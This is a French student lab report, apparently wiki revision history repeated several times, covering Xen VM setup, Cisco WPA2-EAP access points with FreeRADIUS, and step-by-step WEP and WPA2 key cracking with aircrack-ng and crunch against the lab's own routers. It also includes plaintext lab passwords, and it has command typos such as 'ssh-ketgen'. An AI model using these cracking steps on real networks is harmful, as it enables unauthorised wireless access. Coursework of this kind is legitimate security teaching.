2- Se mettre en mode previligié :

enable
Password = "Cisco"

3- Se mettre en mode configuration :

config term

(On peut aussi verifier la configuration de la borne avec "show run")

NB : Les commandes 5 à 10, sont à faire pour chaque groupe de la promo.

4- Pour utiliser le system en 'authentication, authorization, and accounting', il faut cette commande :

aaa new-model

5- On crée un server radius pour un groupe :

radius-server host < ip_groupe6 > auth-port 1812 acct-port 1813 // on remplace ip_groupe6 par l'IP de notre groupe (de la VM) , et comme port d'authentification 1812,et accounting 1813

6- On defini le server group :

aaa group server radius radius_groupe6 // on remplace groupe6 par le nom de notre groupe "IMA2a5-4fun"

7- Puis, on associe à ce groupe de serveur le serveur créé sur la VM:

server <ip_groupe6> auth-port 1812 acct-port 1813

8- Ensuite, on defini le login et le groupe server que par lequel l'utilisateur passera pour s'authentifier :

aaa authentication login eap_IMA2a5-4fun group radius_IMA2a5-4fun // groupe6 remplacé par le nom de notre groupe

9- On arrive à la création des SSID, protégé par la méthode WPA2-EAP :

dot11 ssid SSID_groupe6 // pour notre groupe groupe6="IMA2a5_4fun"
authentication open eap eap_IMA2a5-4fun
authentication network-eap eap_IMA2a5-4fun
authentication key-management wpa

10- Configurer les vlans des groupes :

interface Dot11Radio0 // on rentre d'abord dans l'interface Dot11Radio0
encryption vlan x mode ciphers aes-ccm tkip // Où x est le numéro du vlan . Pour notre groupe x=7

Pour pouvoir se connecter au réseau, il faudra relier l'interfaces virtuelle à l'interface gigabites, via des 'bridge-groupe', et comme il y a plusieurs grouoes, il faut créer autant des sous-interfaces dot11radio0 et puis la relier
aux sous-interfaces gigabites.

11- Créer une sous-interface pour chaque groupe, en donnant à l'instance le numéro du vlan :

interface dot11Radio0.num_vlan // num_vlan a remplacer par le numéro du vlan
encapsulation dot1Q num_vlan
bridge-group num_vlan

12- Créer une sous-interface gigabite pour chaque groupe, en donnant à l'instance le numéro du vlan :

interface gigabite0.num_vlan // num_vlan a remplacer par le numéro du vlan
encapsulation dot1Q num_vlan
bridge-group num_vlan

13- Ajouter les SSID à l'interface Dot11Radio0

interface Dot11Radio0 // se mettre dans la bonne interface (i.e Dot11Radio0)
ssid SSID_groupe // on remplace "groupe" par le nom du groupe de la promo /* CETTE COMMANDE EST À FAIRE POUR TOUT LES SSID */

14- rendre les SSID visibles :

interface Dot11Radio0
mbssid // Il faut rajouter l'option "mbssid" à l'interface Dot11Radio0
dot11 ssid SSID_groupe6 // pour notre groupe groupe6="IMA2a5_4fun"
mbssid guest-mode // mettre les ssid en guest-mode pour qu'il soient visibles. /* CES COMMANDES SONT À FAIRE POUR CHAQUE SSID */

=== Configuration serveur FreeRadius ===

Installation de freeradius:

apt-get install freeradius

Dans le fichier <code>/etc/freeradius/3.0/users</code> on ajoute la ligne:

nyx Cleartext-Password := "glopglop"

Dans le fichier <code>/etc/freeradius/3.0/mods-enabled/eap</code> on modifie la ligne:

eap{
default_eap_type = peap
}

Dans le fichier <code>/etc/freeradius/mods-enabled/mschap</code> on décommente les lignes suivantes

<code>
use_mppe = yes
require_encryption = yes
require_strong = yes
</code>

et on ajoute la ligne suivante:

with_ntdomain_hack = yes

== Crackage de la clé WEP ==

Etape 1: Installation de aircrack-ng

Pour installer aircrack-ng il nous faut etablir la connexion internet par Ethernet dans le eeepc
Ensuite :

apt-get install aircrack-ng

Comme le wifi du pc ne fonctionne pas correctement on utilise un module WI-FI Wi-pi pour le visualiser peripherique on utilise la commande

airmon-ng (pour voir le nom du Wi-pi)
airmon-ng start wlx40a5ef0125eg

[[Fichier:Hf img1.png|700px|center]]

Ensuite il renomme le périphérique en wlan0mon

[[Fichier:HF Img2.png|700px|center]]

On peut ensuite ecouté le réseau avec la commande airodump-ng en spécifiant le canal -c et le module wi-fi utilisé

airodump-ng -c 8 wlan0mon

On récupere l'adresse correspondante a cracotte 6 pour nous c'est 04:DA:D2:9C:50:55

[[Fichier:Wep-image1.png|700px|center]]

Ensuite on capture les packets pour avoir assez IV pour cracker la clé wep cela crée un fichier .cap qu'on utilisera par la suite

airodump-ng -w out -c 8 --bssid 04:DA:D2:9C:50:55 wlan0mon

En parrallèle on lance aircrack pour effectuer des tentatives pour obtenir la clé wep

aircrack-ng out-01.cap

Maintenant il faut attendre d'avoir assez donnée pour casser la clé wep
sachant que avec 25 000 IV on a 50% de chance d'obtenir le mdp
et 50 000 on 90% de chance

[[Fichier:Wep-image2.png|700px|center]]

=== Cassage du WPA2 ===

Dans cette partie, on utilisera la méthode du dictionnaire.

Pour le cassage du WPA on a besoin du handshake pour le recuperer on ecoute le réseau avec la commande airodump-ng

airodump-ng -c 8 wlan0mon

On récupere l'adresse correspondante a Kracotte 6 pour nous c'est 04:DA:D2:9C:50:5D

Ensuite on doit récupérer le handshake pour ça on utilise airodump

airodump-ng -c 2 --bssid 04:DA:D2:9C:50:5D -w -tplink wlan0mon

[[Fichier:Recup handshake wpa 2.png|700px|center]]

Cela nous crée un .cap avec le handshake

Comme la puissance de calcul et petite sur les eeepc on utilise une zabeth

on crée le dictionnaire avec crunch :

crunch 8 8 0123456789 >> psw.txt

ensuite lance aircrack avec la commande suivante :

aircrack-ng -0 -w dictionnaire.txt tplink-01.cap

[[Fichier:Wpa craked.png|700px|center]]

au bout de 45min on trouve la clé wpa.

<VirtualHost *:80>
ServerName ima2a5-4fun.site
ServerAlias www.ima2a5-4fun.site
DocumentRoot "/var/www/ima2a5-4fun"
<Directory "/var/www/ima2a5-4fun">
Options +FollowSymLinks
AllowOverride all
Require all granted
</Directory>
ErrorLog /var/log/apache2/error.ima2a5-4fun.site.log
CustomLog /var/log/apache2/access.ima2a5-4fun.site.com.log combined
</VirtualHost>

TP sysres IMA2a5 2019/2020 G6

2019-11-28T08:42:55Z

Jcabrald : /* Configuration serveur FreeRadius */

Jorge Cabral & Hamza Fahim

== Introduction ==
Le projet a pour but de mettre en place un réseau sur 2 salles du bâtiment E de polytech constitué de 2 routeurs, 2 commutateurs, 2 bornes Wifi et un serveur.
Chaque groupe dispose de machines virtuelles sur le serveur, qui permettront de constituer chacun un domaine acheté sur GANDI.
Les routeurs et commutateurs seront configurés à l'aide de netbooks configurés par nos soins.

== Installation du réseau : connexion des routeurs, commutateurs, bornes WiFi et du serveur Cordouan ==
[[Fichier:archi_reseau_2.png]]

== Mise en place du serveur ==

=== Préparation et configuration des machines virtuelles ===

==== Création de la machine virtuelle ====
La machine virtuelle est crée sur le serveur Cordouan :
ssh root@cordouan.insecserv.deule.net

Création de la machine virtuelle :
xen-create-image --hostname=ima2a5-4fun --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --force

==== Démarrage/Arrêt/Redémarrage de la machine virtuelle ====
Avant de démarrer la VM, nous devons modifierle fichier /etc/xen/ima2a5-4fun.cfg afin de rajouter le bridge.
Il faut d'abord récuperer le nom du bridge avec la commande:
brctl show
Le du bridge est :IMA2a5
Ensuite nous remplaçons dans le fichier "ima2a5-4fun.cfg" la ligne contenant "vif = [ 'mac=00:16:3E:A8:74:CA']" par :
vif = [ 'mac=00:16:3E:A8:74:CA, bridge=IMA2a5']

Puis,nous pouvons démarrager la machine virtuelle :
xl create /etc/xen/ima2a5-4fun.cfg

et acceder à la VM :
xl console ima2a5-4fun
L'utilisateur étant:
user : root
password: c'est le contenu de ligne commençant par "Root Password" du fichier "/var/log/xen-tools/ima2a5-4fun.log"

Pour changer le password root, utiliser:
passwd

On peut revenir à la machine hôte sans arrêter la MV avec la combinaison
Ctrl + AltGr + ]

Arrêt de la machine virtuelle depuis l'hôte :
xl destroy ima2a5-4fun

==== Adaptation de la machine virtuelle à l'architecture réseau du projet ====
Coordonnées IP statiques de la machine virtuelle sur le fichier /etc/network/interfaces
iface eth0 inet static
address 193.48.57.166
netmask 255.255.255.240
gateway 193.48.57.172

==== Personnalisation des points de montage /var et /home ====

Création de 2 volumes de 10GB sur la machine hôte :
lvcreate -L10G -n ima2a5-4fun-home virtual
lvcreate -L10G -n ima2a5-4fun-var virtual

Formatage des volumes :
mkfs.ext4 /dev/virtual/ima2a5-4fun-home
mkfs.ext4 /dev/virtual/ima2a5-4fun-var

Inclusion des volumes dans la machine virtuelle en modifiant /etc/xen/ima2a5-4fun.cfg :

root = '/dev/xvda2 ro'
disk = [
'file:/usr/local/xen/domains/ima2a5-4fun/disk.img,xvda2,w',
'file:/usr/local/xen/domains/ima2a5-4fun/swap.img,xvda1,w',
'phy:/dev/virtual/ima2a5-4fun-home,xvdb1,w',
'phy:/dev/virtual/ima2a5-4fun-var,xvdb2,w'
]

Afin de vérifier si tout est correct on arrête complétement la VM (et non pas rebboter) et on recréé la VM

puis, vérifier sur la machine hôte et la VM si les deux partitions on bien été créées avec la commande:
fdisk -l

Puis, on modifie le fichier /etc/fstable de la VM pour que l'OS les monte automatiquement au démarrage:
# <file system> <mount point> <type> <options> <dump> <pass>
proc /proc proc defaults 0 0
devpts /dev/pts devpts rw,noexec,nosuid,gid=5,mode=620 0 0
/dev/xvda1 none swap sw 0 0
/dev/xvda2 / xt4 noatime,nodiratime,errors=remount-ro 0 1
/dev/xvdb1 /home ext4 defaults 0 2
/dev/xvdb2 /var ext4 defaults 0 2

==== Installation des serveurs SSH, DNS et https ====

Installation du serveur apache :
apt install apache2

Installation du serveur ssh :
apt install openssh-server

Création du service sshd lancé au démarrage par runit :
mkdir /etc/service
mkdir /etc/service/sshd
touch /etc/service/sshd/run
configuration du fichier etc/service/sshd/run:
#!/bin/sh
ssh-ketgen -A >/dev/null 2>&1
[ -r conf ] && . ./conf
exec /usr/sbin/sshd -D $OPTS

Autorise l'exécution du fichier run
chmod +x /etc/service/sshd/run

== Sécurisation Wifi par WPA2-EAP ==
=== Configuration des points d'accès Wi-Fi===

Dans cette partie, on dispose de deux bornes wifi a configurer, la premiére en E306 et l'autre en E304, en utilisera le server FreeRadius pour l'identification.
Tout d'abord effectuons un purge:
apt purge brltty

Puis:

1- Acceder à la configuration de la borne wifi :

minicom -os

On change la configuration pour: Port = /dev/ttyUSB0, 9600 bauds et sans control de flux

2- Se mettre en mode previligié :

enable
Password = "Cisco"

3- Se mettre en mode configuration :

config term

(On peut aussi verifier la configuration de la borne avec "show run")

NB : Les commandes 5 à 10, sont à faire pour chaque groupe de la promo.

4- Pour utiliser le system en 'authentication, authorization, and accounting', il faut cette commande :

aaa new-model

5- On crée un server radius pour un groupe :

radius-server host < ip_groupe6 > auth-port 1812 acct-port 1813 // on remplace ip_groupe6 par l'IP de notre groupe (de la VM) , et comme port d'authentification 1812,et accounting 1813

6- On defini le server group :

aaa group server radius radius_groupe6 // on remplace groupe6 par le nom de notre groupe "IMA2a5-4fun"

7- Puis, on associe à ce groupe de serveur le serveur créé sur la VM:

server <ip_groupe6> auth-port 1812 acct-port 1813

8- Ensuite, on defini le login et le groupe server que par lequel l'utilisateur passera pour s'authentifier :

aaa authentication login eap_IMA2a5-4fun group radius_IMA2a5-4fun // groupe6 remplacé par le nom de notre groupe

9- On arrive à la création des SSID, protégé par la méthode WPA2-EAP :

dot11 ssid SSID_groupe6 // pour notre groupe groupe6="IMA2a5_4fun"
authentication open eap eap_IMA2a5-4fun
authentication network-eap eap_IMA2a5-4fun
authentication key-management wpa

10- Configurer les vlans des groupes :

interface Dot11Radio0 // on rentre d'abord dans l'interface Dot11Radio0
encryption vlan x mode ciphers aes-ccm tkip // Où x est le numéro du vlan . Pour notre groupe x=7

Pour pouvoir se connecter au réseau, il faudra relier l'interfaces virtuelle à l'interface gigabites, via des 'bridge-groupe', et comme il y a plusieurs grouoes, il faut créer autant des sous-interfaces dot11radio0 et puis la relier
aux sous-interfaces gigabites.

11- Créer une sous-interface pour chaque groupe, en donnant à l'instance le numéro du vlan :

interface dot11Radio0.num_vlan // num_vlan a remplacer par le numéro du vlan
encapsulation dot1Q num_vlan
bridge-group num_vlan

12- Créer une sous-interface gigabite pour chaque groupe, en donnant à l'instance le numéro du vlan :

interface gigabite0.num_vlan // num_vlan a remplacer par le numéro du vlan
encapsulation dot1Q num_vlan
bridge-group num_vlan

13- Ajouter les SSID à l'interface Dot11Radio0

interface Dot11Radio0 // se mettre dans la bonne interface (i.e Dot11Radio0)
ssid SSID_groupe // on remplace "groupe" par le nom du groupe de la promo /* CETTE COMMANDE EST À FAIRE POUR TOUT LES SSID */

14- rendre les SSID visibles :

interface Dot11Radio0
mbssid // Il faut rajouter l'option "mbssid" à l'interface Dot11Radio0
dot11 ssid SSID_groupe6 // pour notre groupe groupe6="IMA2a5_4fun"
mbssid guest-mode // mettre les ssid en guest-mode pour qu'il soient visibles. /* CES COMMANDES SONT À FAIRE POUR CHAQUE SSID */

=== Configuration serveur FreeRadius ===

Installation de freeradius:

apt-get install freeradius

Dans le fichier <code>/etc/freeradius/3.0/users</code> on ajoute la ligne:

nyx Cleartext-Password := "glopglop"

Dans le fichier <code>/etc/freeradius/3.0/mods-enabled/eap</code> on modifie la ligne:

eap{
default_eap_type = peap
}

Dans le fichier <code>/etc/freeradius/mods-enabled/mschap</code> on décommente les lignes suivantes

<code>
use_mppe = yes
require_encryption = yes
require_strong = yes
</code>
et on ajoute la ligne suivante:

with_ntdomain_hack = yes

== Crackage de la clé WEP ==

Etape 1: Installation de aircrack-ng

Pour installer aircrack-ng il nous faut etablir la connexion internet par Ethernet dans le eeepc
Ensuite :

apt-get install aircrack-ng

Comme le wifi du pc ne fonctionne pas correctement on utilise un module WI-FI Wi-pi pour le visualiser peripherique on utilise la commande

airmon-ng (pour voir le nom du Wi-pi)
airmon-ng start wlx40a5ef0125eg

[[Fichier:Hf img1.png|700px|center]]

Ensuite il renomme le périphérique en wlan0mon

[[Fichier:HF Img2.png|700px|center]]

On peut ensuite ecouté le réseau avec la commande airodump-ng en spécifiant le canal -c et le module wi-fi utilisé

airodump-ng -c 8 wlan0mon

On récupere l'adresse correspondante a cracotte 6 pour nous c'est 04:DA:D2:9C:50:55

[[Fichier:Wep-image1.png|700px|center]]

Ensuite on capture les packets pour avoir assez IV pour cracker la clé wep cela crée un fichier .cap qu'on utilisera par la suite

airodump-ng -w out -c 8 --bssid 04:DA:D2:9C:50:55 wlan0mon

En parrallèle on lance aircrack pour effectuer des tentatives pour obtenir la clé wep

aircrack-ng out-01.cap

Maintenant il faut attendre d'avoir assez donnée pour casser la clé wep
sachant que avec 25 000 IV on a 50% de chance d'obtenir le mdp
et 50 000 on 90% de chance

[[Fichier:Wep-image2.png|700px|center]]

=== Cassage du WPA2 ===

Dans cette partie, on utilisera la méthode du dictionnaire.

Pour le cassage du WPA on a besoin du handshake pour le recuperer on ecoute le réseau avec la commande airodump-ng

airodump-ng -c 8 wlan0mon

On récupere l'adresse correspondante a Kracotte 6 pour nous c'est 04:DA:D2:9C:50:5D

Ensuite on doit récupérer le handshake pour ça on utilise airodump

airodump-ng -c 2 --bssid 04:DA:D2:9C:50:5D -w -tplink wlan0mon

[[Fichier:Recup handshake wpa 2.png|700px|center]]

Cela nous crée un .cap avec le handshake

Comme la puissance de calcul et petite sur les eeepc on utilise une zabeth

on crée le dictionnaire avec crunch :

crunch 8 8 0123456789 >> psw.txt

ensuite lance aircrack avec la commande suivante :

aircrack-ng -0 -w dictionnaire.txt tplink-01.cap

[[Fichier:Wpa craked.png|700px|center]]

au bout de 45min on trouve la clé wpa.

<VirtualHost *:80>
ServerName ima2a5-4fun.site
ServerAlias www.ima2a5-4fun.site
DocumentRoot "/var/www/ima2a5-4fun"
<Directory "/var/www/ima2a5-4fun">
Options +FollowSymLinks
AllowOverride all
Require all granted
</Directory>
ErrorLog /var/log/apache2/error.ima2a5-4fun.site.log
CustomLog /var/log/apache2/access.ima2a5-4fun.site.com.log combined
</VirtualHost>

TP sysres IMA2a5 2019/2020 G6

2019-11-28T08:42:20Z

Jcabrald : /* Configuration serveur FreeRadius */

Jorge Cabral & Hamza Fahim

== Introduction ==
Le projet a pour but de mettre en place un réseau sur 2 salles du bâtiment E de polytech constitué de 2 routeurs, 2 commutateurs, 2 bornes Wifi et un serveur.
Chaque groupe dispose de machines virtuelles sur le serveur, qui permettront de constituer chacun un domaine acheté sur GANDI.
Les routeurs et commutateurs seront configurés à l'aide de netbooks configurés par nos soins.

== Installation du réseau : connexion des routeurs, commutateurs, bornes WiFi et du serveur Cordouan ==
[[Fichier:archi_reseau_2.png]]

== Mise en place du serveur ==

=== Préparation et configuration des machines virtuelles ===

==== Création de la machine virtuelle ====
La machine virtuelle est crée sur le serveur Cordouan :
ssh root@cordouan.insecserv.deule.net

Création de la machine virtuelle :
xen-create-image --hostname=ima2a5-4fun --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --force

==== Démarrage/Arrêt/Redémarrage de la machine virtuelle ====
Avant de démarrer la VM, nous devons modifierle fichier /etc/xen/ima2a5-4fun.cfg afin de rajouter le bridge.
Il faut d'abord récuperer le nom du bridge avec la commande:
brctl show
Le du bridge est :IMA2a5
Ensuite nous remplaçons dans le fichier "ima2a5-4fun.cfg" la ligne contenant "vif = [ 'mac=00:16:3E:A8:74:CA']" par :
vif = [ 'mac=00:16:3E:A8:74:CA, bridge=IMA2a5']

Puis,nous pouvons démarrager la machine virtuelle :
xl create /etc/xen/ima2a5-4fun.cfg

et acceder à la VM :
xl console ima2a5-4fun
L'utilisateur étant:
user : root
password: c'est le contenu de ligne commençant par "Root Password" du fichier "/var/log/xen-tools/ima2a5-4fun.log"

Pour changer le password root, utiliser:
passwd

On peut revenir à la machine hôte sans arrêter la MV avec la combinaison
Ctrl + AltGr + ]

Arrêt de la machine virtuelle depuis l'hôte :
xl destroy ima2a5-4fun

==== Adaptation de la machine virtuelle à l'architecture réseau du projet ====
Coordonnées IP statiques de la machine virtuelle sur le fichier /etc/network/interfaces
iface eth0 inet static
address 193.48.57.166
netmask 255.255.255.240
gateway 193.48.57.172

==== Personnalisation des points de montage /var et /home ====

Création de 2 volumes de 10GB sur la machine hôte :
lvcreate -L10G -n ima2a5-4fun-home virtual
lvcreate -L10G -n ima2a5-4fun-var virtual

Formatage des volumes :
mkfs.ext4 /dev/virtual/ima2a5-4fun-home
mkfs.ext4 /dev/virtual/ima2a5-4fun-var

Inclusion des volumes dans la machine virtuelle en modifiant /etc/xen/ima2a5-4fun.cfg :

root = '/dev/xvda2 ro'
disk = [
'file:/usr/local/xen/domains/ima2a5-4fun/disk.img,xvda2,w',
'file:/usr/local/xen/domains/ima2a5-4fun/swap.img,xvda1,w',
'phy:/dev/virtual/ima2a5-4fun-home,xvdb1,w',
'phy:/dev/virtual/ima2a5-4fun-var,xvdb2,w'
]

Afin de vérifier si tout est correct on arrête complétement la VM (et non pas rebboter) et on recréé la VM

puis, vérifier sur la machine hôte et la VM si les deux partitions on bien été créées avec la commande:
fdisk -l

Puis, on modifie le fichier /etc/fstable de la VM pour que l'OS les monte automatiquement au démarrage:
# <file system> <mount point> <type> <options> <dump> <pass>
proc /proc proc defaults 0 0
devpts /dev/pts devpts rw,noexec,nosuid,gid=5,mode=620 0 0
/dev/xvda1 none swap sw 0 0
/dev/xvda2 / xt4 noatime,nodiratime,errors=remount-ro 0 1
/dev/xvdb1 /home ext4 defaults 0 2
/dev/xvdb2 /var ext4 defaults 0 2

==== Installation des serveurs SSH, DNS et https ====

Installation du serveur apache :
apt install apache2

Installation du serveur ssh :
apt install openssh-server

Création du service sshd lancé au démarrage par runit :
mkdir /etc/service
mkdir /etc/service/sshd
touch /etc/service/sshd/run
configuration du fichier etc/service/sshd/run:
#!/bin/sh
ssh-ketgen -A >/dev/null 2>&1
[ -r conf ] && . ./conf
exec /usr/sbin/sshd -D $OPTS

Autorise l'exécution du fichier run
chmod +x /etc/service/sshd/run

== Sécurisation Wifi par WPA2-EAP ==
=== Configuration des points d'accès Wi-Fi===

Dans cette partie, on dispose de deux bornes wifi a configurer, la premiére en E306 et l'autre en E304, en utilisera le server FreeRadius pour l'identification.
Tout d'abord effectuons un purge:
apt purge brltty

Puis:

1- Acceder à la configuration de la borne wifi :

minicom -os

On change la configuration pour: Port = /dev/ttyUSB0, 9600 bauds et sans control de flux

2- Se mettre en mode previligié :

enable
Password = "Cisco"

3- Se mettre en mode configuration :

config term

(On peut aussi verifier la configuration de la borne avec "show run")

NB : Les commandes 5 à 10, sont à faire pour chaque groupe de la promo.

4- Pour utiliser le system en 'authentication, authorization, and accounting', il faut cette commande :

aaa new-model

5- On crée un server radius pour un groupe :

radius-server host < ip_groupe6 > auth-port 1812 acct-port 1813 // on remplace ip_groupe6 par l'IP de notre groupe (de la VM) , et comme port d'authentification 1812,et accounting 1813

6- On defini le server group :

aaa group server radius radius_groupe6 // on remplace groupe6 par le nom de notre groupe "IMA2a5-4fun"

7- Puis, on associe à ce groupe de serveur le serveur créé sur la VM:

server <ip_groupe6> auth-port 1812 acct-port 1813

8- Ensuite, on defini le login et le groupe server que par lequel l'utilisateur passera pour s'authentifier :

aaa authentication login eap_IMA2a5-4fun group radius_IMA2a5-4fun // groupe6 remplacé par le nom de notre groupe

9- On arrive à la création des SSID, protégé par la méthode WPA2-EAP :

dot11 ssid SSID_groupe6 // pour notre groupe groupe6="IMA2a5_4fun"
authentication open eap eap_IMA2a5-4fun
authentication network-eap eap_IMA2a5-4fun
authentication key-management wpa

10- Configurer les vlans des groupes :

interface Dot11Radio0 // on rentre d'abord dans l'interface Dot11Radio0
encryption vlan x mode ciphers aes-ccm tkip // Où x est le numéro du vlan . Pour notre groupe x=7

Pour pouvoir se connecter au réseau, il faudra relier l'interfaces virtuelle à l'interface gigabites, via des 'bridge-groupe', et comme il y a plusieurs grouoes, il faut créer autant des sous-interfaces dot11radio0 et puis la relier
aux sous-interfaces gigabites.

11- Créer une sous-interface pour chaque groupe, en donnant à l'instance le numéro du vlan :

interface dot11Radio0.num_vlan // num_vlan a remplacer par le numéro du vlan
encapsulation dot1Q num_vlan
bridge-group num_vlan

12- Créer une sous-interface gigabite pour chaque groupe, en donnant à l'instance le numéro du vlan :

interface gigabite0.num_vlan // num_vlan a remplacer par le numéro du vlan
encapsulation dot1Q num_vlan
bridge-group num_vlan

13- Ajouter les SSID à l'interface Dot11Radio0

interface Dot11Radio0 // se mettre dans la bonne interface (i.e Dot11Radio0)
ssid SSID_groupe // on remplace "groupe" par le nom du groupe de la promo /* CETTE COMMANDE EST À FAIRE POUR TOUT LES SSID */

14- rendre les SSID visibles :

interface Dot11Radio0
mbssid // Il faut rajouter l'option "mbssid" à l'interface Dot11Radio0
dot11 ssid SSID_groupe6 // pour notre groupe groupe6="IMA2a5_4fun"
mbssid guest-mode // mettre les ssid en guest-mode pour qu'il soient visibles. /* CES COMMANDES SONT À FAIRE POUR CHAQUE SSID */

=== Configuration serveur FreeRadius ===

Installation de freeradius:

apt-get install freeradius

Dans le fichier <code>/etc/freeradius/3.0/users</code> on ajoute la ligne:

nyx Cleartext-Password := "glopglop"

Dans le fichier <code>/etc/freeradius/3.0/mods-enabled/eap</code> on modifie la ligne:

eap{
default_eap_type = peap
}

Dans le fichier <code>/etc/freeradius/mods-enabled/mschap</code> on décommente les lignes suivantes

use_mppe = yes
require_encryption = yes
require_strong = yes

et on ajoute la ligne suivante:

with_ntdomain_hack = yes

== Crackage de la clé WEP ==

Etape 1: Installation de aircrack-ng

Pour installer aircrack-ng il nous faut etablir la connexion internet par Ethernet dans le eeepc
Ensuite :

apt-get install aircrack-ng

Comme le wifi du pc ne fonctionne pas correctement on utilise un module WI-FI Wi-pi pour le visualiser peripherique on utilise la commande

airmon-ng (pour voir le nom du Wi-pi)
airmon-ng start wlx40a5ef0125eg

[[Fichier:Hf img1.png|700px|center]]

Ensuite il renomme le périphérique en wlan0mon

[[Fichier:HF Img2.png|700px|center]]

On peut ensuite ecouté le réseau avec la commande airodump-ng en spécifiant le canal -c et le module wi-fi utilisé

airodump-ng -c 8 wlan0mon

On récupere l'adresse correspondante a cracotte 6 pour nous c'est 04:DA:D2:9C:50:55

[[Fichier:Wep-image1.png|700px|center]]

Ensuite on capture les packets pour avoir assez IV pour cracker la clé wep cela crée un fichier .cap qu'on utilisera par la suite

airodump-ng -w out -c 8 --bssid 04:DA:D2:9C:50:55 wlan0mon

En parrallèle on lance aircrack pour effectuer des tentatives pour obtenir la clé wep

aircrack-ng out-01.cap

Maintenant il faut attendre d'avoir assez donnée pour casser la clé wep
sachant que avec 25 000 IV on a 50% de chance d'obtenir le mdp
et 50 000 on 90% de chance

[[Fichier:Wep-image2.png|700px|center]]

=== Cassage du WPA2 ===

Dans cette partie, on utilisera la méthode du dictionnaire.

Pour le cassage du WPA on a besoin du handshake pour le recuperer on ecoute le réseau avec la commande airodump-ng

airodump-ng -c 8 wlan0mon

On récupere l'adresse correspondante a Kracotte 6 pour nous c'est 04:DA:D2:9C:50:5D

Ensuite on doit récupérer le handshake pour ça on utilise airodump

airodump-ng -c 2 --bssid 04:DA:D2:9C:50:5D -w -tplink wlan0mon

[[Fichier:Recup handshake wpa 2.png|700px|center]]

Cela nous crée un .cap avec le handshake

Comme la puissance de calcul et petite sur les eeepc on utilise une zabeth

on crée le dictionnaire avec crunch :

crunch 8 8 0123456789 >> psw.txt

ensuite lance aircrack avec la commande suivante :

aircrack-ng -0 -w dictionnaire.txt tplink-01.cap

[[Fichier:Wpa craked.png|700px|center]]

au bout de 45min on trouve la clé wpa.

<VirtualHost *:80>
ServerName ima2a5-4fun.site
ServerAlias www.ima2a5-4fun.site
DocumentRoot "/var/www/ima2a5-4fun"
<Directory "/var/www/ima2a5-4fun">
Options +FollowSymLinks
AllowOverride all
Require all granted
</Directory>
ErrorLog /var/log/apache2/error.ima2a5-4fun.site.log
CustomLog /var/log/apache2/access.ima2a5-4fun.site.com.log combined
</VirtualHost>

TP sysres IMA2a5 2019/2020 G6

2019-11-28T08:24:44Z

Jcabrald : /* Sécurisation Wifi par WPA2-EAP */

Jorge Cabral & Hamza Fahim

== Introduction ==
Le projet a pour but de mettre en place un réseau sur 2 salles du bâtiment E de polytech constitué de 2 routeurs, 2 commutateurs, 2 bornes Wifi et un serveur.
Chaque groupe dispose de machines virtuelles sur le serveur, qui permettront de constituer chacun un domaine acheté sur GANDI.
Les routeurs et commutateurs seront configurés à l'aide de netbooks configurés par nos soins.

== Installation du réseau : connexion des routeurs, commutateurs, bornes WiFi et du serveur Cordouan ==
[[Fichier:archi_reseau_2.png]]

== Mise en place du serveur ==

=== Préparation et configuration des machines virtuelles ===

==== Création de la machine virtuelle ====
La machine virtuelle est crée sur le serveur Cordouan :
ssh root@cordouan.insecserv.deule.net

Création de la machine virtuelle :
xen-create-image --hostname=ima2a5-4fun --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --force

==== Démarrage/Arrêt/Redémarrage de la machine virtuelle ====
Avant de démarrer la VM, nous devons modifierle fichier /etc/xen/ima2a5-4fun.cfg afin de rajouter le bridge.
Il faut d'abord récuperer le nom du bridge avec la commande:
brctl show
Le du bridge est :IMA2a5
Ensuite nous remplaçons dans le fichier "ima2a5-4fun.cfg" la ligne contenant "vif = [ 'mac=00:16:3E:A8:74:CA']" par :
vif = [ 'mac=00:16:3E:A8:74:CA, bridge=IMA2a5']

Puis,nous pouvons démarrager la machine virtuelle :
xl create /etc/xen/ima2a5-4fun.cfg

et acceder à la VM :
xl console ima2a5-4fun
L'utilisateur étant:
user : root
password: c'est le contenu de ligne commençant par "Root Password" du fichier "/var/log/xen-tools/ima2a5-4fun.log"

Pour changer le password root, utiliser:
passwd

On peut revenir à la machine hôte sans arrêter la MV avec la combinaison
Ctrl + AltGr + ]

Arrêt de la machine virtuelle depuis l'hôte :
xl destroy ima2a5-4fun

==== Adaptation de la machine virtuelle à l'architecture réseau du projet ====
Coordonnées IP statiques de la machine virtuelle sur le fichier /etc/network/interfaces
iface eth0 inet static
address 193.48.57.166
netmask 255.255.255.240
gateway 193.48.57.172

==== Personnalisation des points de montage /var et /home ====

Création de 2 volumes de 10GB sur la machine hôte :
lvcreate -L10G -n ima2a5-4fun-home virtual
lvcreate -L10G -n ima2a5-4fun-var virtual

Formatage des volumes :
mkfs.ext4 /dev/virtual/ima2a5-4fun-home
mkfs.ext4 /dev/virtual/ima2a5-4fun-var

Inclusion des volumes dans la machine virtuelle en modifiant /etc/xen/ima2a5-4fun.cfg :

root = '/dev/xvda2 ro'
disk = [
'file:/usr/local/xen/domains/ima2a5-4fun/disk.img,xvda2,w',
'file:/usr/local/xen/domains/ima2a5-4fun/swap.img,xvda1,w',
'phy:/dev/virtual/ima2a5-4fun-home,xvdb1,w',
'phy:/dev/virtual/ima2a5-4fun-var,xvdb2,w'
]

Afin de vérifier si tout est correct on arrête complétement la VM (et non pas rebboter) et on recréé la VM

puis, vérifier sur la machine hôte et la VM si les deux partitions on bien été créées avec la commande:
fdisk -l

Puis, on modifie le fichier /etc/fstable de la VM pour que l'OS les monte automatiquement au démarrage:
# <file system> <mount point> <type> <options> <dump> <pass>
proc /proc proc defaults 0 0
devpts /dev/pts devpts rw,noexec,nosuid,gid=5,mode=620 0 0
/dev/xvda1 none swap sw 0 0
/dev/xvda2 / xt4 noatime,nodiratime,errors=remount-ro 0 1
/dev/xvdb1 /home ext4 defaults 0 2
/dev/xvdb2 /var ext4 defaults 0 2

==== Installation des serveurs SSH, DNS et https ====

Installation du serveur apache :
apt install apache2

Installation du serveur ssh :
apt install openssh-server

Création du service sshd lancé au démarrage par runit :
mkdir /etc/service
mkdir /etc/service/sshd
touch /etc/service/sshd/run
configuration du fichier etc/service/sshd/run:
#!/bin/sh
ssh-ketgen -A >/dev/null 2>&1
[ -r conf ] && . ./conf
exec /usr/sbin/sshd -D $OPTS

Autorise l'exécution du fichier run
chmod +x /etc/service/sshd/run

== Sécurisation Wifi par WPA2-EAP ==
